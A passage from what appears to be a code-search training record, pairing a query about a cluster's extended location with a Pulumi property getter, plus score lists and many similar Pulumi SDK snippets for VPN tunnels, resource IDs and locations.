None,\n tunnel2_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel2_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel2_vgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel_inside_ip_version: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input[str]] = None,\n vgw_telemetries: Optional[pulumi.Input[Sequence[pulumi.Input['VpnConnectionVgwTelemetryArgs']]]] = None,\n vpn_gateway_id: Optional[pulumi.Input[str]] = None):\n if arn is not None:\n pulumi.set(__self__, \"arn\", arn)\n if core_network_arn is not None:\n pulumi.set(__self__, \"core_network_arn\", core_network_arn)\n if core_network_attachment_arn is not None:\n pulumi.set(__self__, \"core_network_attachment_arn\", core_network_attachment_arn)\n if customer_gateway_configuration is not None:\n pulumi.set(__self__, \"customer_gateway_configuration\", customer_gateway_configuration)\n if customer_gateway_id is not None:\n pulumi.set(__self__, \"customer_gateway_id\", customer_gateway_id)\n if enable_acceleration is not None:\n pulumi.set(__self__, \"enable_acceleration\", enable_acceleration)\n if local_ipv4_network_cidr is not None:\n pulumi.set(__self__, \"local_ipv4_network_cidr\", local_ipv4_network_cidr)\n if local_ipv6_network_cidr is not None:\n pulumi.set(__self__, \"local_ipv6_network_cidr\", local_ipv6_network_cidr)\n if outside_ip_address_type is not None:\n pulumi.set(__self__, \"outside_ip_address_type\", outside_ip_address_type)\n if remote_ipv4_network_cidr is not None:\n pulumi.set(__self__, \"remote_ipv4_network_cidr\", remote_ipv4_network_cidr)\n if remote_ipv6_network_cidr is not None:\n pulumi.set(__self__, \"remote_ipv6_network_cidr\", remote_ipv6_network_cidr)\n if routes is not None:\n pulumi.set(__self__, \"routes\", routes)\n if static_routes_only is not None:\n pulumi.set(__self__, \"static_routes_only\", static_routes_only)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if tags_all is not None:\n pulumi.set(__self__, \"tags_all\", tags_all)\n if transit_gateway_attachment_id is not None:\n pulumi.set(__self__, \"transit_gateway_attachment_id\", transit_gateway_attachment_id)\n if transit_gateway_id is not None:\n pulumi.set(__self__, \"transit_gateway_id\", transit_gateway_id)\n if transport_transit_gateway_attachment_id is not None:\n pulumi.set(__self__, 
\"transport_transit_gateway_attachment_id\", transport_transit_gateway_attachment_id)\n if tunnel1_address is not None:\n pulumi.set(__self__, \"tunnel1_address\", tunnel1_address)\n if tunnel1_bgp_asn is not None:\n pulumi.set(__self__, \"tunnel1_bgp_asn\", tunnel1_bgp_asn)\n if tunnel1_bgp_holdtime is not None:\n pulumi.set(__self__, \"tunnel1_bgp_holdtime\", tunnel1_bgp_holdtime)\n if tunnel1_cgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel1_cgw_inside_address\", tunnel1_cgw_inside_address)\n if tunnel1_dpd_timeout_action is not None:\n pulumi.set(__self__, \"tunnel1_dpd_timeout_action\", tunnel1_dpd_timeout_action)\n if tunnel1_dpd_timeout_seconds is not None:\n pulumi.set(__self__, \"tunnel1_dpd_timeout_seconds\", tunnel1_dpd_timeout_seconds)\n if tunnel1_enable_tunnel_lifecycle_control is not None:\n pulumi.set(__self__, \"tunnel1_enable_tunnel_lifecycle_control\", tunnel1_enable_tunnel_lifecycle_control)\n if tunnel1_ike_versions is not None:\n pulumi.set(__self__, \"tunnel1_ike_versions\", tunnel1_ike_versions)\n if tunnel1_inside_cidr is not None:\n pulumi.set(__self__, \"tunnel1_inside_cidr\", tunnel1_inside_cidr)\n if tunnel1_inside_ipv6_cidr is not None:\n pulumi.set(__self__, \"tunnel1_inside_ipv6_cidr\", tunnel1_inside_ipv6_cidr)\n if tunnel1_log_options is not None:\n pulumi.set(__self__, \"tunnel1_log_options\", tunnel1_log_options)\n if tunnel1_phase1_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel1_phase1_dh_group_numbers\", tunnel1_phase1_dh_group_numbers)\n if tunnel1_phase1_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase1_encryption_algorithms\", tunnel1_phase1_encryption_algorithms)\n if tunnel1_phase1_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase1_integrity_algorithms\", tunnel1_phase1_integrity_algorithms)\n if tunnel1_phase1_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel1_phase1_lifetime_seconds\", tunnel1_phase1_lifetime_seconds)\n if tunnel1_phase2_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel1_phase2_dh_group_numbers\", tunnel1_phase2_dh_group_numbers)\n if tunnel1_phase2_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase2_encryption_algorithms\", tunnel1_phase2_encryption_algorithms)\n if tunnel1_phase2_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase2_integrity_algorithms\", tunnel1_phase2_integrity_algorithms)\n if tunnel1_phase2_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel1_phase2_lifetime_seconds\", tunnel1_phase2_lifetime_seconds)\n if tunnel1_preshared_key is not None:\n pulumi.set(__self__, \"tunnel1_preshared_key\", tunnel1_preshared_key)\n if tunnel1_rekey_fuzz_percentage is not None:\n pulumi.set(__self__, \"tunnel1_rekey_fuzz_percentage\", tunnel1_rekey_fuzz_percentage)\n if tunnel1_rekey_margin_time_seconds is not None:\n pulumi.set(__self__, \"tunnel1_rekey_margin_time_seconds\", tunnel1_rekey_margin_time_seconds)\n if tunnel1_replay_window_size is not None:\n pulumi.set(__self__, \"tunnel1_replay_window_size\", tunnel1_replay_window_size)\n if tunnel1_startup_action is not None:\n pulumi.set(__self__, \"tunnel1_startup_action\", tunnel1_startup_action)\n if tunnel1_vgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel1_vgw_inside_address\", tunnel1_vgw_inside_address)\n if tunnel2_address is not None:\n pulumi.set(__self__, \"tunnel2_address\", tunnel2_address)\n if tunnel2_bgp_asn is not None:\n pulumi.set(__self__, \"tunnel2_bgp_asn\", tunnel2_bgp_asn)\n if 
tunnel2_bgp_holdtime is not None:\n pulumi.set(__self__, \"tunnel2_bgp_holdtime\", tunnel2_bgp_holdtime)\n if tunnel2_cgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel2_cgw_inside_address\", tunnel2_cgw_inside_address)\n if tunnel2_dpd_timeout_action is not None:\n pulumi.set(__self__, \"tunnel2_dpd_timeout_action\", tunnel2_dpd_timeout_action)\n if tunnel2_dpd_timeout_seconds is not None:\n pulumi.set(__self__, \"tunnel2_dpd_timeout_seconds\", tunnel2_dpd_timeout_seconds)\n if tunnel2_enable_tunnel_lifecycle_control is not None:\n pulumi.set(__self__, \"tunnel2_enable_tunnel_lifecycle_control\", tunnel2_enable_tunnel_lifecycle_control)\n if tunnel2_ike_versions is not None:\n pulumi.set(__self__, \"tunnel2_ike_versions\", tunnel2_ike_versions)\n if tunnel2_inside_cidr is not None:\n pulumi.set(__self__, \"tunnel2_inside_cidr\", tunnel2_inside_cidr)\n if tunnel2_inside_ipv6_cidr is not None:\n pulumi.set(__self__, \"tunnel2_inside_ipv6_cidr\", tunnel2_inside_ipv6_cidr)\n if tunnel2_log_options is not None:\n pulumi.set(__self__, \"tunnel2_log_options\", tunnel2_log_options)\n if tunnel2_phase1_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel2_phase1_dh_group_numbers\", tunnel2_phase1_dh_group_numbers)\n if tunnel2_phase1_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase1_encryption_algorithms\", tunnel2_phase1_encryption_algorithms)\n if tunnel2_phase1_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase1_integrity_algorithms\", tunnel2_phase1_integrity_algorithms)\n if tunnel2_phase1_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel2_phase1_lifetime_seconds\", tunnel2_phase1_lifetime_seconds)\n if tunnel2_phase2_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel2_phase2_dh_group_numbers\", tunnel2_phase2_dh_group_numbers)\n if tunnel2_phase2_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase2_encryption_algorithms\", tunnel2_phase2_encryption_algorithms)\n if tunnel2_phase2_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase2_integrity_algorithms\", tunnel2_phase2_integrity_algorithms)\n if tunnel2_phase2_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel2_phase2_lifetime_seconds\", tunnel2_phase2_lifetime_seconds)\n if tunnel2_preshared_key is not None:\n pulumi.set(__self__, \"tunnel2_preshared_key\", tunnel2_preshared_key)\n if tunnel2_rekey_fuzz_percentage is not None:\n pulumi.set(__self__, \"tunnel2_rekey_fuzz_percentage\", tunnel2_rekey_fuzz_percentage)\n if tunnel2_rekey_margin_time_seconds is not None:\n pulumi.set(__self__, \"tunnel2_rekey_margin_time_seconds\", tunnel2_rekey_margin_time_seconds)\n if tunnel2_replay_window_size is not None:\n pulumi.set(__self__, \"tunnel2_replay_window_size\", tunnel2_replay_window_size)\n if tunnel2_startup_action is not None:\n pulumi.set(__self__, \"tunnel2_startup_action\", tunnel2_startup_action)\n if tunnel2_vgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel2_vgw_inside_address\", tunnel2_vgw_inside_address)\n if tunnel_inside_ip_version is not None:\n pulumi.set(__self__, \"tunnel_inside_ip_version\", tunnel_inside_ip_version)\n if type is not None:\n pulumi.set(__self__, \"type\", type)\n if vgw_telemetries is not None:\n pulumi.set(__self__, \"vgw_telemetries\", vgw_telemetries)\n if vpn_gateway_id is not None:\n pulumi.set(__self__, \"vpn_gateway_id\", vpn_gateway_id)",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n address_family: Optional[pulumi.Input[str]] = None,\n allocation_default_netmask_length: Optional[pulumi.Input[int]] = None,\n allocation_max_netmask_length: Optional[pulumi.Input[int]] = None,\n allocation_min_netmask_length: Optional[pulumi.Input[int]] = None,\n allocation_resource_tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n auto_import: Optional[pulumi.Input[bool]] = None,\n aws_service: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n ipam_scope_id: Optional[pulumi.Input[str]] = None,\n locale: Optional[pulumi.Input[str]] = None,\n public_ip_source: Optional[pulumi.Input[str]] = None,\n publicly_advertisable: Optional[pulumi.Input[bool]] = None,\n source_ipam_pool_id: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n __props__=None):\n ..."
] | [
"0.6447655",
"0.6238602",
"0.60722184",
"0.5890332",
"0.57577604",
"0.5746685",
"0.57304883",
"0.5688393",
"0.56835395",
"0.56028044",
"0.5589953",
"0.5589953",
"0.5589953",
"0.5589815",
"0.5561867",
"0.55557245",
"0.55503047",
"0.5528516",
"0.551963",
"0.55083257",
"0.5507104",
"0.5484785",
"0.54815567",
"0.54731333",
"0.5456437",
"0.5444488",
"0.5441277",
"0.54037106",
"0.53976536",
"0.53840363",
"0.5377784",
"0.5371969",
"0.53714365",
"0.5367424",
"0.53659713",
"0.5361175",
"0.5359696",
"0.5357121",
"0.5349888",
"0.5327476",
"0.5315972",
"0.5301544",
"0.52971923",
"0.5295122",
"0.5291445",
"0.5283604",
"0.5268822",
"0.5264353",
"0.5261494",
"0.52581257",
"0.5254149",
"0.52529407",
"0.52456075",
"0.5243484",
"0.5241904",
"0.52398765",
"0.5236054",
"0.5234029",
"0.52217144",
"0.5213666",
"0.5208834",
"0.5207189",
"0.519613",
"0.51942956",
"0.519308",
"0.5188177",
"0.51857114",
"0.5183726",
"0.51804394",
"0.5180082",
"0.5174037",
"0.51720375",
"0.51677716",
"0.5162175",
"0.51579833",
"0.5157657",
"0.5155775",
"0.5151071",
"0.5149276",
"0.5147294",
"0.5135359",
"0.5134204",
"0.5133753",
"0.5133389",
"0.51278996",
"0.5126143",
"0.51225",
"0.5119645",
"0.5118728",
"0.5116901",
"0.5111602",
"0.5109751",
"0.5109123",
"0.51079476",
"0.51078546",
"0.5103655",
"0.510052",
"0.5097831",
"0.5097769",
"0.5095034",
"0.5094984"
] | 0.0 | -1 |
The extended location of the cluster associated with the resource. | def extended_location(self) -> pulumi.Input['ExtendedLocationArgs']:
return pulumi.get(self, "extended_location") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def extended_location(self) -> pulumi.Output['outputs.ExtendedLocationResponse']:\n return pulumi.get(self, \"extended_location\")",
"def extended_location(self) -> pulumi.Output['outputs.ExtendedLocationResponse']:\n return pulumi.get(self, \"extended_location\")",
"def extended_location(self) -> pulumi.Output[Optional['outputs.ExtendedLocationResponse']]:\n return pulumi.get(self, \"extended_location\")",
"def set_up_extended_location(self, mc: ManagedCluster) -> ManagedCluster:\n self._ensure_mc(mc)\n\n edge_zone = self.context.get_edge_zone()\n if edge_zone:\n mc.extended_location = self.models.ExtendedLocation(\n name=edge_zone,\n type=self.models.ExtendedLocationTypes.EDGE_ZONE\n )\n return mc",
"def extended_location(self) -> Optional[pulumi.Input['ExtendedLocationArgs']]:\n return pulumi.get(self, \"extended_location\")",
"def extended_location(self) -> Optional['outputs.ExtendedLocationResponse']:\n return pulumi.get(self, \"extended_location\")",
"def extended_location(self) -> Optional['outputs.ExtendedLocationResponse']:\n return pulumi.get(self, \"extended_location\")",
"def location(self) -> str:\n return self.metadata.location",
"def resource_type(self):\n return 'cluster'",
"def cluster(self):\n return self._cluster",
"def cluster(self):\n return self._cluster",
"def location(self):\n self.manager.refresh_client()\n return self.content[\"location\"]",
"def _course_location(self):\r\n return \"location:{org}+{number}+{run}+course+{run}\".format(**self._course_dict)",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return self.__location",
"def location(self) -> str:\n return self.__location",
"def location(self) -> str:\n return self.__location",
"def cluster_name(self):\n return self.name",
"def location(self):\r\n return self._get('location', {})",
"def location(self):\n return self.properties.get(\"location\", Location())",
"def location(self) -> str:\n return self._location",
"def location(self) -> str:\n\t\tind = self._raw_result['locationIndex']\n\t\tif ind > -1 and ind < len(self._client.locations):\n\t\t\treturn self._client.locations[ind]['name']\n\t\treturn \"\"",
"def get_default_alt_loc(self):\n return self.default_alt_loc",
"def cluster_name(self) -> str:\n return pulumi.get(self, \"cluster_name\")",
"def cluster_name(self) -> str:\n return pulumi.get(self, \"cluster_name\")",
"def default_secondary_location(self) -> str:\n return pulumi.get(self, \"default_secondary_location\")",
"def location(self):\n return self._location",
"def location(self):\n return self._location",
"def location(self) -> object:\n return self._location",
"def cluster_name(self):\n return self._data['cluster_name']",
"def Lokation(self):\n return self.getMylocation()",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def _cluster_scoped_iam_path(self):\n return f\"{IAM_ROLE_PATH}{self.stack_name}/\"",
"def location(self) -> Object:\n return self._location",
"def get_cluster_entry(self):\n\n cert_data = self.cluster_description.get(\"certificateAuthority\", {}).get(\"data\", \"\")\n endpoint = self.cluster_description.get(\"endpoint\")\n arn = self.cluster_description.get(\"arn\")\n\n return OrderedDict([\n (\"cluster\", OrderedDict([\n (\"certificate-authority-data\", cert_data),\n (\"server\", endpoint)\n ])),\n (\"name\", arn)\n ])",
"def get_location(self):\r\n return self.__location",
"def cal_location(self):\n return self.setup_location.name",
"def cluster_description(self):\n if self._cluster_description is None:\n if self._parsed_globals is None:\n client = self._session.create_client(\"eks\")\n else:\n client = self._session.create_client(\n \"eks\",\n region_name=self._parsed_globals.region,\n endpoint_url=self._parsed_globals.endpoint_url,\n verify=self._parsed_globals.verify_ssl\n )\n full_description = client.describe_cluster(name=self._cluster_name)\n self._cluster_description = full_description[\"cluster\"]\n\n if \"status\" not in self._cluster_description:\n raise EKSClusterError(\"Cluster not found\")\n if self._cluster_description[\"status\"] not in [\"ACTIVE\", \"UPDATING\"]:\n raise EKSClusterError(\"Cluster status is {0}\".format(\n self._cluster_description[\"status\"]\n ))\n\n return self._cluster_description",
"def get_location(self):\n\t\treturn self.location",
"def __str__(self):\n return \"Cluster\"",
"def get_location(self):\r\n return None",
"def locate(self):\n return utils.get_object(\"crds\", self.observatory, \"locate\")",
"def get_location(self):\n return self._overridden_location or self.get_default_location()",
"def get_location(self):\n return self.location",
"def locations(self):\r\n return resource.Location(self)",
"def location(self) -> Optional[str]:\n raise NotImplementedError()",
"def cluster_id(self):\n return self._cluster_id",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def get_cluster_info(self) -> Dict[str, Any]:\n pass",
"def location(self):\r\n\r\n raise SemanticError(\"Location not implemented\");",
"def cal_location(self):\n return self.location.name",
"async def location(self):\n if not hasattr(self, \"_location\"):\n self._location = await Stack.fetch_stack_value(self, \"http://usefulinc.com/ns/doap#location\", await self.uuid)\n return self._location",
"def location(self) -> Optional[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> Optional[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> Optional[str]:\n return pulumi.get(self, \"location\")",
"def location(self):\r\n try:\r\n return self.data['location']\r\n except KeyError:\r\n return self.data['station_name']",
"def get_cluster_name(cls):\n\n mid = Machineid()\n if mid.is_sps_cluster:\n return cls.SPS\n if mid.is_spts_cluster:\n return cls.SPTS\n if mid.is_mdfl_cluster:\n return cls.MDFL\n\n return cls.LOCAL",
"def cluster_subnet(self) -> str:\n return pulumi.get(self, \"cluster_subnet\")",
"def management_cluster(self) -> pulumi.Output['outputs.PrivateCloudManagementCluster']:\n return pulumi.get(self, \"management_cluster\")",
"def location(self):\n if self.scoping:\n return self.scoping.location\n else:\n return None",
"def getLocation(self):\n return self._Location",
"def location_arn(self) -> Optional[str]:\n return pulumi.get(self, \"location_arn\")",
"def get_location(self):\n return self.request({\n \"path\": \"/\" + UUID + \"/location\"\n })",
"def location(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"location\")"
] | [
"0.67308724",
"0.67308724",
"0.6552111",
"0.6427688",
"0.64267975",
"0.64260936",
"0.64260936",
"0.63151413",
"0.6296761",
"0.6123441",
"0.6123441",
"0.595561",
"0.58933264",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5868833",
"0.5868833",
"0.5868833",
"0.5862934",
"0.5843456",
"0.5832257",
"0.5774442",
"0.5670738",
"0.565388",
"0.5642064",
"0.5642064",
"0.5637912",
"0.5634472",
"0.5634472",
"0.5632768",
"0.56296843",
"0.56284314",
"0.5607931",
"0.5607931",
"0.5607931",
"0.5607931",
"0.5607931",
"0.5592737",
"0.5577344",
"0.5573659",
"0.55710924",
"0.5565424",
"0.55634725",
"0.5558331",
"0.55544007",
"0.55512756",
"0.55403364",
"0.5537851",
"0.55323946",
"0.5517471",
"0.55100954",
"0.5498214",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54803187",
"0.5467255",
"0.5461056",
"0.5451514",
"0.5442272",
"0.5442272",
"0.5442272",
"0.5434703",
"0.54240304",
"0.541763",
"0.53864765",
"0.5384029",
"0.53797865",
"0.53771985",
"0.5368183",
"0.5366416",
"0.5366416",
"0.5366416"
] | 0.6507004 | 3 |
The resource ID of the Network Fabric l3IsolationDomain. | def l3_isolation_domain_id(self) -> pulumi.Input[str]:
return pulumi.get(self, "l3_isolation_domain_id") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def l3_isolation_domain_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"l3_isolation_domain_id\")",
"def resource_id(self) -> str:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> str:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> str:\n return pulumi.get(self, \"resource_id\")",
"def external_network_id(self) -> str:\n return pulumi.get(self, \"external_network_id\")",
"def id(self):\n return self._domain.id",
"def domain_id(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"domain_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def dns_zone_resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"dns_zone_resource_id\")",
"def domain_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"domain_id\")",
"def domain_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"domain_id\")",
"def resource_group_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_pool_id(self) -> str:\n return pulumi.get(self, \"resource_pool_id\")",
"def failover_group_id(self) -> str:\n return pulumi.get(self, \"failover_group_id\")",
"def resource_id(self) -> Optional[str]:\n return pulumi.get(self, \"resource_id\")",
"def custom_compliance_domain_id(self):\n return self._custom_compliance_domain_id",
"def unique_id(self):\n return self._light.address",
"def get_keystone_v3_domain_id(self, domain_name):\n LOG_OBJ.debug(\"Get the domain ID.\")\n\n _url = \"http://\" + self.host_ip + \":35357/v3/domains?name=\" + \\\n str(domain_name)\n _headers = {'x-auth-token': self.cloud_admin_info[\"token_domain\"],\n 'content-type': 'application/json'}\n _body = None\n\n response = self.request(\"GET\", _url, _headers, _body)\n\n if response is None:\n LOG_OBJ.error(\"No response from Server while getting the \"\n \"ID of domain\")\n print (\"No response from Server while getting the \"\n \"ID of domain\")\n return response\n\n if response.status not in [200, 201, 202, 203, 204]:\n LOG_OBJ.error(\"Get domain ID Failed with status %s and error \"\n \": %s\" % (response.status, response.data))\n print (\"Get domain ID Failed with status %s and error : %s\" %\n (response.status, response.data))\n return response.status\n\n output = json.loads(response.data)\n LOG_OBJ.info(\"Domain details : %s \" % output)\n if len(output['domains']) != 1:\n LOG_OBJ.debug(\"No. of domains with name %s is %s\"\n % (domain_name, len(output['domains'])))\n print(\"No. of domains with name %s is %s\"\n % (domain_name, len(output['domains'])))\n return\n\n return output['domains'][0]['id']",
"def resource_group_id(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def vulnerability_resilience_id():\n\n if S3VulnerabilityModel.resilience_pid is None:\n # Get the parameter_id of the aggregated_indicator\n db = current.db\n table = db.vulnerability_aggregated_indicator\n row = db(table.uuid == \"Resilience\").select(table.parameter_id,\n limitby=(0, 1)).first()\n try:\n S3VulnerabilityModel.resilience_pid = row.parameter_id\n except:\n # DB not initialised\n pass\n\n return S3VulnerabilityModel.resilience_pid",
"def external_id(self) -> str:\n return self._search_in_properties(ATTR_GUID)",
"def managed_rule_identifier(self) -> str:\n return pulumi.get(self, \"managed_rule_identifier\")",
"def managed_rule_identifier(self) -> str:\n return pulumi.get(self, \"managed_rule_identifier\")",
"def resource_group_id(self) -> Optional[str]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def external_id(self):\n return self._external_id",
"def external_id(self):\n return self._external_id",
"def data_center_id(self) -> str:\n return pulumi.get(self, \"data_center_id\")",
"def data_center_id(self) -> str:\n return pulumi.get(self, \"data_center_id\")",
"def unique_id(self):\n return self.config_entry.entry_id + \"lsa\"",
"def hydrofabric_data_id(self) -> str:\n return self._hydrofabric_data_id",
"def unique_identifier(self) -> str:\n return pulumi.get(self, \"unique_identifier\")",
"def unique_id(self):\n return f\"c{self._zone.controller_index + 1}_z{self._zone.zone_index + 1}\"",
"def unique_id(self):\n return f\"bhyve:program:{self._program_id}\"",
"def internal_id(self) -> str:\n return pulumi.get(self, \"internal_id\")",
"def security_group_id_for_domain_boundary(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"security_group_id_for_domain_boundary\")",
"def storage_account_resource_id(self) -> Optional[str]:\n return pulumi.get(self, \"storage_account_resource_id\")",
"def id(self):\n return self.raw_resource.uuid",
"def establish_id(self):\n if self.config.node_id is None:\n self.config.node_id = str(uuid4()).replace('-', '')\n return self.config.node_id",
"def dataset_id(self) -> str:\n return pulumi.get(self, \"dataset_id\")",
"def dataset_id(self) -> str:\n return pulumi.get(self, \"dataset_id\")",
"def dataset_id(self) -> str:\n return pulumi.get(self, \"dataset_id\")",
"def unique_id(self):\n return self.config_entry.entry_id + \"nls\"",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def network_fabric_controller_id(self) -> str:\n return pulumi.get(self, \"network_fabric_controller_id\")",
"def resourceid(self):",
"def sql_virtual_machine_group_resource_id(self) -> Optional[str]:\n return pulumi.get(self, \"sql_virtual_machine_group_resource_id\")",
